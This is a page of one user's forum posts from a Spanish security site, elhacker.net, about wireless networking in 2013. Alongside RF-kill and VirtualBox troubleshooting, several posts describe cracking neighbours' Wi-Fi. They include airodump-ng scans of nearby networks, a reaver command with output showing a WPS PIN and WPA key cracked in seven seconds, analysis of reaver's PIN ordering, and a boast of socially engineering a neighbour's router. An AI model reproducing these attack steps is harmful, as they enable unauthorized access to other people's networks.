elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16
61  Seguridad Informática / Hacking Wireless / Re: FastWeb Pirelli WPA Discovery (Saber WPA redes FASTWEB-1-XXX) en: 20 Enero 2013, 13:27 pm

http://sviehb.wordpress.com/2011/12/04/prg-eav4202n-default-wpa-key-algorithm/
62  Seguridad Informática / Wireless en Linux / Re: RF-kill....SOLUCIONADO ipw2200 en: 14 Enero 2013, 22:45 pm
Para inyectar no me complico la vida y lo hago con una antena por usb...de esta forma navego perfectamente con la ipw2200 y con la otra uso reaver,por ejemplo.
Me pasaba que sólo me reconocía la interfaz de la ipw como eth1,pero sólo cuando conectaba cualquier antena usb...algo rarísimo...pero no podía utilizar ninguna..sólo sabía que estaban ahí y no podía activarlas,ni manualmente ni con el ifconfig.

Respondiendo a tu pregunta,NO...no vale este método para inyectar...SÓLO para navegar por la red.

pero sí que puedes lanzar airodump-ng y capturar paquetes ;)
kaos@script~$ iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

eth1      IEEE 802.11bg  ESSID:off/any 
          Mode:Managed  Frequency:2.412 GHz  Access Point: Not-Associated   
          Bit Rate:0 kb/s   Tx-Power=20 dBm   Sensitivity=8/0 
          Retry limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:1  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

kaos@script~$ sudo airodump-ng eth1
[sudo] password for kaos:
CH  9 ][ Elapsed: 4 s ][ 2013-01-14 22:46                                         
                                                                                                   
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                   
                                                                                                   
 00:1A:2B:  -79        3        1    0   3  54e  WPA  CCMP   PSK  WLAN_xxxx               
 00:1A:2B:  -78        3       10    4  11  54   WEP  WEP         JAZZTEL_xx               
 00:1A:2B:  -74        2        0    0   9  54   WPA  CCMP   PSK  WLAN_xxxx               
 38:72:C0:  -69        4        0    0  11  54e  WPA  CCMP   PSK  JAZZTEL_xxxx             
 00:1A:2B:  -68        6        0    0   4  54   WPA  CCMP   PSK  WLAN_xxxx               
 00:1A:2B:  -82        2        0    0   3  54   WEP  WEP         WLAN_xx                 
 62:C0:6F:  -45       19        0    0   6  54e  WPA  CCMP   PSK  vodafonexxxx             
 00:01:38:  -78        2        0    0   1  54 . WPA  TKIP   PSK  ONOxxxx                 
 00:01:38:  -77        2        0    0   1  54 . WEP  WEP         ONOxxxx                 
 64:68:0C:  -68       12        4    1   1  54e  WPA  CCMP   PSK  JAZZTEL_xxxx             
 1C:7E:E5:  -80        2        1    0   1  54e. WPA2 CCMP   PSK  <length: 14>             

kaos@script~$

63  Seguridad Informática / Wireless en Linux / RF-kill....SOLUCIONADO ipw2200 en: 14 Enero 2013, 15:58 pm
Saludos a la comunidad...trasteando con diferentes distros me "cargué" el wifi...mi tarjeta es una intel ipw2200...me pasaban cosas increíbles,como hacer un iwconfg,reconocer la interfaz pero no poder levantarla...o no poder conectarme a la red...y ya ni hablar de lanzar un airodump-ng...me lanzaba este mensaje:
ioctl (SIOCSIFFLAGS) failed:Operation not possible due to RF-kill

no obstante,como digo,mi sistema me la reconocía perfectamente.....incluso el led dejó de funcionar.Al principio pensé en algo físico...imposible pues no detectaría la interfaz...

ls -l /lib/firmware/ipw2200*
kaos@MMXIII~$ ls -l /lib/firmware/ipw2200*
-rw-r--r-- 1 root root 191154 2010-12-13 21:01 /lib/firmware/ipw2200-bss.fw
-rw-r--r-- 1 root root 185428 2010-12-13 21:01 /lib/firmware/ipw2200-ibss.fw
-rw-r--r-- 1 root root 187836 2010-12-13 21:01 /lib/firmware/ipw2200-sniffer.fw

o bien

kaos@MMXIII~$ lspci | grep Wireless
02:04.0 Network controller: Intel Corporation PRO/Wireless 2200BG [Calexico2] Network Connection (rev 05)

incluso probé con:
 $ sudo rm /dev/rfkill
pero nada....


Así que buscando por google dí con la solución,que no era otra que instalar de nuevo rfkill...
Una vez instalado

rfkill list wifi

apareía algo como esto:

ANTES

0: hp-wifi: Wireless LAN
Soft blocked: yes
Hard blocked: no
1: phy0: Wireless LAN
Soft blocked: no
Hard blocked: yes


Tenía bloqueado todo...para eso,usé el programa arriba mencionado y edité los bloqueos:

rfkill unblock 0
rfkill unblock 1

Después para asegurar que los cambios eran permanentes(sino,no estaría navegando xd ;)),ejecuto:

rfkill list wifi

DESPUÉS

kaos@MMXIII:~$ sudo rfkill list wifi
[sudo] password for kaos:
0: hp-wifi: Wireless LAN
   Soft blocked: no
   Hard blocked: no
1: phy0: Wireless LAN
   Soft blocked: no
   Hard blocked: no

Reiniciar
Y andando......

64  Seguridad Informática / Wireless en Linux / Re: 8c:0c:a3:xx... Modem invul ? en: 10 Enero 2013, 19:06 pm
inflator lo he probado bastantes veces...con bastantes antenas...por mis experimentos no me "dice" nada que reaver no me haya dicho...en cualquiera de sus variantes.
Inflator sigue dejando pines sin probar,al igual que reaver...con la diferencia de que reaver prueba de 7 en 7(intercalando un intento de +6 en el último nº) los pines,mientras que inflator lo hace de 2 en 2....harto estoy de darle vueltas al programa,de observar los intentos,la frecuencia de los pines....incluso lo he estudiado con eclipse...
Y como he dicho,he probado todas las opciones y por ejemplo,cuando intento meter un pin concreto,me "redirige" al que le parece...al igual que reaver.
me río porque me tengo que reir...no pretendía ofender a nadie...pero cuando hablo de algo,lo hago después de probar y probar...y ya son 7 años los que llevo dedicándome al tema inhalámbrico  ;)
Salud

Por cierto...haciendo un poco de "ingeniería social" he conseguido darle la vuelta a un router de orange...para ver el pin y O_0 sorpresa...no está...me dice el vecino que se lo dieron por tlfno y que no se acuerda... :rolleyes:
una pena,porque la pass la tengo...pero lo que me interesaba era el pin :laugh:
65  Seguridad Informática / Wireless en Linux / Re: Airlin (Atacando Wpa y Wpa2 sin Handshake) en: 10 Enero 2013, 18:53 pm
eso mismo pensaba yo.... ;)
66  Seguridad Informática / Wireless en Linux / Re: Airlin (Atacando Wpa y Wpa2 sin Handshake) en: 9 Enero 2013, 10:39 am
Y a qué handshake se le va a pasar un diccionario,si se supone que no se tiene? :o

67  Seguridad Informática / Wireless en Linux / Re: 8c:0c:a3:xx... Modem invul ? en: 8 Enero 2013, 17:08 pm
ese tiempo sólo es obtenido cuando se tiene el pin correcto,no nos engañemos... :laugh:
inflator=Reaver....dando un entorno gráfico para introducir los parámetros que se quieran,
para los que  con los comandos,a veces nos atascamos... ;)

Demostrado queda que es vulnerable a reaver..la cuestión es:
¿se bloqueará el router tras 10 intentos fallidos de pin,cual orange?,
o bien permitirá una ataque lineal(cual vodafone),hasta obtener el pin correcto?

El pin empleado para empezar por defecto(salvo que se especifique cualquier otro) empieza por 1234....lo cual deja sin probar bastantes...cualquiera que empieze por 0,como es el caso del ejemplo del enlace(empieza por 032X)...por lo tanto deduzco que NUNCA encontrará un pin que sea inferior a 1234... :silbar:
68  Seguridad Informática / Hacking / Re: (CAMBIAR IP A UNA ESPAÑOLA) (SOY NUEVO EN ESTO DEL HACK) en: 6 Enero 2013, 20:09 pm
tienes una extensión de mozilla llamada anonymoX 1.0 que igual te sirve  :silbar:

http://www.anonymox.net/en
69  Seguridad Informática / Wireless en Linux / Re: Patrones de PINs para WPA en: 4 Enero 2013, 22:34 pm

hablando de copy-paste,hago uno,pero sólo para desmontar una teoría:

"vodafonexxxx

ESSID: vodafonexxxx
BSSID: 62:C0:6F:XX:XX:XX
MODELO: HG556a // -- // --
V. Firm: V100R001C10B070SP03 // -- // -- //
Wps Activado: Sí
PIN: 3663@@@@ // 3722@@@@ // 3442@@@@//3365@@@@"


PERMITIDME QUE ME RÍA DE ESTOS PINES "GENÉRICOS"...PARA MUESTRA UN BOTÓN, EN TIEMPO REAL:

bassassin:~$ sudo reaver -i mon0 -b 62:C0:6F:YY:XY:YY -p 4314YYYY  -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

  • Waiting for beacon from 62:C0:6F:YY:XY:YY
  • Switching mon0 to channel 1
  • Switching mon0 to channel 4
  • Associated with 62:C0:6F:YY:XY:YY (ESSID: vodafoneXYYY)
  • Trying pin 4314YYYY
  • Sending EAPOL START request
  • Received identity request
  • Sending identity response
  • Received M1 message
  • Sending M2 message
  • Received M3 message
  • Sending M4 message
  • Received M5 message
  • Sending M6 message
  • Received M7 message
  • Sending WSC NACK
  • Sending WSC NACK
  • Pin cracked in 7 seconds
  • WPS PIN: '4314YYYY'
  • WPA PSK: 'XXXXXXXXXXXXXX' ----TODAS MAYÚSCULAS,DE LA A-Z
  • AP SSID: 'vodafoneXYYY'

Las vodafone que tengo el pin empieza por 4....curioso
 :laugh: :laugh: :laugh:
70  Seguridad Informática / Wireless en Linux / Re: Hola, Duda con respecto Wifi en: 4 Enero 2013, 11:21 am
Antes de arrancar backbox...con VBox iniciado:
Configuración
Sistema,red....
habilitar adaptador de red....lo habilitas
   Conectado a:elige la opción adecuada,(con virtual box normalmente se elige adaptador puente,para utilizar la conexión del sistema anfitrión)
   nombre: el que tenga tu tarjeta...wlan0,ath0...o el que sea
    AVANZADAS
Tipo de adaptador
    Dirección MAC
Y  CABLE CONECTADO


Estas son las opciones que has de configurar...



   
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines